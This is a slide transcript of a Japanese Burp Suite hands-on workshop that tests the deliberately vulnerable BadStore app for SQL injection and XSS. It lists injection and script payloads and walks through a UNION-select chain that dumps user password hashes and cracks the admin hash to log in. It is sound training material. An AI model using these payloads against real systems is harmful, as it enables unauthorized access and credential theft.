burpsuite_badstore

Transcript

1. インストールできてますか？ Burp suite JAVA 8 ブラウザ （推奨：Firefox） （推奨：アドオン foxyproxy）

2. @madamadaikeru22 Kobe Vulnerability AssessmenT

3. 神戸脆弱性診断の会 #2 Burp suite ハンズオン

4. 注意事項

5. 絶対に、自分の管理下にないホストには脆弱性検 査を実行してはいけません。 www www www

6. 桝谷 昌史 （ますたに まさふみ） 神戸デジタル・ラボ セキュリティソリューション事業部 Masafumi Masutani @madamadaikeru22

7. 報告 速報 実施 事前確認 見積もり

8. 報告 速報 実施 事前確認 見積もり

9. HTTP通信

10. HTTP Request

11. Webページへのアクセス

12. 実際にはHTTPと呼ばれるプロトコルを使用して通信をしています

13. HTTPリクエストは３つに分けることができる。 リクエストライン メッセージヘッダ メッセージボディ GET / HTTP/1.1 メソッド リクエストURL プロトコルバージョン

14. （参考）HTTP基礎入門 https://www.slideshare.net/BurpSuiteJapanUserGr/burpsuitejapanhttp

15. None

16. Burp suite free edition PortSwigger社が開発したProxyツールで無料版(free edition)と有料版(pro)があり、有料版には動的スキャン 機能など使用可能になる 無料版はHTTP通信を確認し、改ざんするProxy機能が 利用できます

17. ブラウザ サーバ HTTPリクエスト HTTPレスポンス ブラウザ サーバ リクエスト レスポンス プロキシ 改変した

    リクエスト レスポンス 通常の挙動 Burpを使用する場合 プロキシ機能によってリクエストを改変し脆弱性を確認する ブラウザの通常操作では出来ないリクエストを試行できる
18. None
19. None
20. None
21. None
22. None
23. None
24. None

25. 検証サイト

26. BadStore 脆弱性スキャンツールのテストあるいは脆弱性内容の学習を目 的として、意図的に脆弱性が作り込まれたWebアプリケーション

27. 箱庭BadStore burp extension https://github.com/ankokuty/HakoniwaBadStore

28. 箱庭BadStore burp extension

29. None
30. None

31. 動作不良時の対応 何かがうまくいかないときは、/cgi-bin/initdbs.cgiにアクセスしてデータベース をリセットしてください。 一時ディレクトリ（C：¥Users¥｛user｝¥AppData¥Local¥Temp¥.badstore¥da ta）を削除し、Hakoniwa BadStoreサーバーを再起動します。

32. （参考）The Broken Web Applications BWA (The Broken Web Applications) プロジェクトは、

    既知の脆弱性を持ったいろいろなアプリケーションを 稼働させる仮想マシンを提供します。 ・Webアプリケーションのセキュリティを学びたい ・自動診断ツールをテストしたい ・ソースコード分析ツールをテストしたい ・WAFや、それに類するコード技術をテストしたい など https://sourceforge.net/projects/owaspbwa/files/1.2/

33. VM内容 1. トレーニング・アプリケーション 特定の脆弱性毎に学べるようにガイドしてくれるWebアプリケーションです。 2. 現実的で意図的に脆弱なアプリケーション 現実的なWebアプリケーションに見える Webアプリケーション(実際は幅広い脆弱性を持っている)です。 3. 実際のアプリケーションの古いバージョン

    既知の問題を持ったオープンソースアプリケーションです。

34. VM内容 4. ツールテストのためのアプリケーション Webアプリケーション・セキュリティ・スキャナのような 自動化ツールをテストするためのアプリケーションです。 5. ページもしくは小さなアプリケーションのデモ 特定のコンセプトをデモするために、脆弱性を持たせた 小さなアプリケーションです。 6.

    OWASP デモ・アプリケーション OWASPアプリケーションのデモで、脆弱性は持っていません。

35. プロキシ機能

36. ブラウザのプロキシ

37. None
38. None
39. None
40. None
41. None

42. パラメータ値の改ざん

43. None
44. None
45. None

46. intruder機能

47. 様々な診断タスクを自動化できる機能 ・予め登録した診断パターンを自動的に送信し、レスポンスの中から不審 な挙動を探し出す ・ID番号を順に変化させながら送信し、レスポンスに含まれるデータ収集 する ・ユーザー名とパスワードのリストを用意し、認証機能に対して全ての組み 合わせを試す intruder

48. None
49. None
50. None
51. None

52. repeater機能

53. None
54. None
55. None

56. 脆弱性

57. SQLインジェクション SQLインジェクションとは、データベースと連動したWebサ イトで、データベースへの問い合わせや操作を行うプロ グラムにパラメータとしてSQL文の断片を与えることによ り、データベースを改ざんしたり不正に情報を入手される ような脆弱性。

58. XSS クロス・サイト・スクリプティング（XSS）とは、利用者がWeb サイトにアクセスした際に、意図しない不正なJavaスクリ プトコードなどを実行されてしまう脆弱性である。

59. ハンズオン

60. 注意事項

61. 絶対に、自分の管理下にないホストには脆弱性検 査を実行してはいけません。 www www www

62. 脆弱性診断ガイドライン このガイドラインは脆弱性診断士スキルマッププロジェクトによって 作成されました。 Webアプリケーションの脆弱性診断は、自動診断ツールを使った脆 弱性診断だけでは不十分であると言われています。 一定レベルの手動診断による脆弱性診断を行うため、最低限必要 な診断項目や手順を定義しているガイドラインです。

63. 脆弱性診断士スキルマッププロジェクト 特定非営利活動法人日本ネットワークセキュリティ協会（JNSA）の日 本セキュリティオペレーション事業者協議会（ISOG-J）のセキュリティ オペレーションガイドラインWG（WG1）と、OWASP Japan主催の共同 ワーキンググループ 脆弱性診断を行う個人の技術的な能力を具体的にすべく、脆弱性 診断を行う技術者（以下、脆弱性診断士）のスキルマップと学習の指 針となるシラバス、脆弱性診断を行うためのガイドラインを整備して います。

    https://www.owasp.org/index.php/Pentester_Skillmap_Project_JP

64. 情報セキュリティサービス基準

65. 情報セキュリティサービス基準 たくさんのセキュリティサービスが普及している中、セキュリティの専 門知識をもたないサービス利用者がいる サービス事業者を選定しなければいけないとき、サービス品質を判 断することが難しい じゃあ良いサービスの基準をわかり易くまとめたので、これ使って！

66. 情報セキュリティサービス基準

67. 診断基準

68. WebAppPentestGuidelines.pdf https://github.com/ueno1000/WebAppPentestGuidelines/raw/maste r/WebAppPentestGuidelines.pdf

69. SQLインジェクション

70. SQLインジェクション（マニュアル診断） ・問題点 トップページの検索機能においてSQLi が見つかりました。 ・対象パラメータ searchquery

71. SQLインジェクション（マニュアル診断） ・検証方法 入力値 脆弱性あり 脆弱性なし '(シングルクォート) DB関連のエラーが表示されるか、正 常動作と挙動が異なる DB関連のエラーは表示されない ''(シングルクォート2つ)

    DB関連のエラーは表示されない DB関連のエラーは表示されない 入力値 結果 正規値 ※例：Snake Oil 検索結果が表示される。 正常動作を確認しておくことが重要 ※この診断手法の脆弱性の有無については確定ではなく、あくまで可能性を示唆するものである

72. 「'」 「''」

73. SQLインジェクション（マニュアル診断） ・検証方法 入力値 結果 正規値 ※例：Snake Oil 検索結果が表示される。 正常動作を確認しておくことが重要 入力値

    脆弱性あり 脆弱性なし (元の値:文字列)' and 'a'='a' 正常系の動作と比較して同一のレス ポンスとなる 正常系の動作と比較して異なるレスポン スとなる (元の値:文字列)' and 'a'='b' 正常系の動作と比較して異なるレス ポンスとなる 正常系の動作と比較して異なるレスポン スとなる

74. 「' or 'a'='a' --」 「' or 'a'='b' --」

75. XSS

76. 反射型XSS ・問題点 トップページの検索機能において反射 型のXSSが見つかりました。 ・対象パラメータ searchquery

77. 反射・格納型XSS（マニュアル診断） ・検証方法 入力値 結果 正規値 ※例：Snake Oil 検索結果が表示される。 正常動作を確認しておくことが重要 入力値

    脆弱性あり 脆弱性なし ">'><s>XSS 検出パターンが適切にエスケープされ ずに挿入される 検出パターンが適切にエスケープされ て挿入される <script>alert(1)</script> 検出パターンが適切にエスケープされ ずに挿入される 検出パターンが適切にエスケープされ て挿入される javascript:alert(1) URI属性やjavascriptコード等に挿入され、 javascriptスキームとして有効になる javascriptスキームとして有効にならな い '+alert(1)+' 検出パターンが適切にエスケープされ ずに挿入される 検出パターンが適切にエスケープされ て挿入される "onmouseover="alert(1) 検出パターンが適切にエスケープされ ずに挿入される 検出パターンが適切にエスケープされ て挿入される

78. DomBasedXSS（マニュアル診断） ・検証方法 入力値 結果 正規値 ※例：Snake Oil 検索結果が表示される。 正常動作を確認しておくことが重要 入力値

    脆弱性あり 脆弱性なし #">'><img src=x onerror=alert(1)> スクリプトが実行される スクリプトが実行されない

79. 「<script>alert(1);</script>」

80. 診断開始

81. None

82. パラメータ 入力値 診断結果 name <script>alert(1)</script> XSSの脆弱性あり email <script>alert(1)</script> XSSの脆弱性あり comments

    <script>alert(1)</script> XSSの脆弱性あり
83. None

84. パラメータ 入力値 診断結果 email ' or 'a'='a' -- SQLiの脆弱性あり email

    <script>alert(1)</script> XSSの脆弱性あり
85. None

86. intruderをつかってみる

87. None
88. None
89. None
90. None
91. None
92. None
93. None
94. None
95. None
96. None

97. 問題

98. 問題 Q. 管理者ユーザでログインせよ。

99. 正常動作 searchquery=test

100. エラー searchquery=a

101. カラム数 searchquery=' union select 1,2,3,4,5 --

102. カラム数 searchquery=' union select 1,2,3,4 --

103. sqlite_master sqlite_masterテーブルは、データベースファイル毎に一つだけ生成されます。 カラム名 内容 type オブジェクトタイプ "table", "index", "trigger", "view"のいずれかが格納される

     name オブジェクトの名前 typeが"table"もしくは"view"の場合はtbl_nameと一致する tbl_namerootpage オブジェクトが所属するテーブルの名前 sql オブジェクトを生成する際に実行されたSQL文（CREATE TABLE, CREATE INDEX, CREATE VIEW, CREATE TRIGGER等）が格納される

104. テーブル名とカラム名 searchquery= 'union select 0,name,sql,4 from sqlite_master --

105. userdbテーブル

106. ユーザ情報 searchquery='union select 0,email,passwd,4 from userdb --

107. ハッシュ値 email「admin」のpasswd「5EBE2294ECD0E0F08EAB7690D2A6EE69」を取得するが、 そのままログインしても失敗するのでパスワードのハッシュ化を疑います。 ハッシュクラッキングサイトを使用して元の値を探します。 https://hashtoolkit.com/

108. 管理者ログイン成功

109. まとめ

110. 脆弱性診断のツールを紹介しましたが、 ツールの使い方ができたからと言って 「診断ができる」わけではありません。 脆弱性検証技術は個人差があるため 常に精進することが必要！！

111. ご清聴ありがとうございました。 ▪神戸脆弱性診断の会 ・勉強会告知 フェイスブックグループ https://www.facebook.com/groups/1407869585989208/ Slackグループ https://kobevat.slack.com ・勉強会記事 はてなブログ http://madamadaikeru222san.hatenablog.com/